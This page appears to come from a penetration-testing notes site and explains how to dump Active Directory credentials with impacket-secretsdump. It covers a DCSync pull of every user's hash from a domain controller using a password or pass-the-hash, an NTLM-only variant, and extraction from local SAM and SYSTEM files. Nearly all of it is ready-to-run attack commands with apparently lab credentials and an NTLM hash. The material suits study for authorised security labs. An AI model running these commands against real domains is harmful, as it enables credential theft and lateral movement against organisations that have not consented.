Using Secretsdump

[Easy-Way] Another way is using Secretsdump directly- Dcsync attack

Fetch all user hashes

# Dumping all users' hashes at once from NTDS.DIT
# Condition for DCsync attack applies here.
impacket-secretsdump -just-dc medtech.com/leon:"rabbit:)"@$dc01

# can also use -just-dc-ntlm flag for ntlm only for all users

# We can also use hash for authentication.
impacket-secretsdump -just-dc beyond.com/[email protected] -hashes :8480fa6ca85394df498139fe5ca02b95

You can check more from the DCSync attack module.

Only Need NTLM Hashes !!!

we can use -just-dc-ntlm a flag for that


impacket-secretsdump -just-dc-ntlm corp.com/jeffadmin:'BrouhahaTungPerorateBroom2023!'@192.168.214.70

Dumping Hash from SAM and SYSTEM files locally

Download and store the SAM and SYSTEM File.

Run below command:

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

PreviousRelay Attack Example Nextmimikatz Tool

Last updated 12 months ago